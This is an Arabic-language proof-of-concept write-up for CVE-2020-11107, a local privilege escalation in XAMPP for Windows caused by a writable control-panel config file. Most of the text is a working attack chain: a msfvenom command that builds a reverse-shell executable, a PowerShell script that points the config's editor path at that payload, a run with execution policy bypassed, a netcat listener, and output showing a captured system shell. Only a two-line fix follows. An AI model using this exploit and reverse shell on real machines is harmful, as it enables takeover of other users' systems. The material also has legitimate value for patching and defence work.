
CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4
CVE-2020-11107 هي ثغرة تصعيد صلاحيات محلية (LPE) تؤثر على Apache Friends XAMPP على ويندوز.
يمكن لمستخدم غير مميز تعديل ملف تكوين لوحة تحكم XAMPP (xampp-control.ini) واستبدال الملف التنفيذي الافتراضي للمحرر (notepad.exe) بملف تنفيذي ضار.
عندما يفتح مستخدم آخر (مثل المسؤول) السجلات عبر لوحة التحكم، يتم تنفيذ البرنامج الضار بصلاحيات الضحية، مما يؤدي إلى تصعيد الصلاحيات.
❗ هذه الثغرة لا تؤثر على لينكس أو ماك.
xampp-control.ini قابل للكتابة عالمياًC:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe
تحقق من إصدار XAMPP:
type C:\xampp\properties.ini
مثال على الإخراج:
base_stack_version=7.3.10-1
base_stack_platform=windows-x64
✅ الإصدار معرض للثغرة.
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe
mkdir C:\temp
# رفع ملف msf.exe إلى C:\temp
نص الاستغلال (PowerShell):
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
تنفيذ النص:
powershell -ExecutionPolicy Bypass -File 50337.ps1
الضحية يقوم بتشغيل:
C:\xampp\xampp-control.exe
ثم يفتح أي ملف سجل من لوحة التحكم.
nc -lvnp 4444
✅ النتيجة:
Connection received...
C:\WINDOWS\system32>
🎉 تم تصعيد الصلاحيات بنجاح
تحديث XAMPP إلى إحدى الإصدارات التالية (أو أحدث):
تقييد الأذونات على:
C:\xampp\xampp-control.ini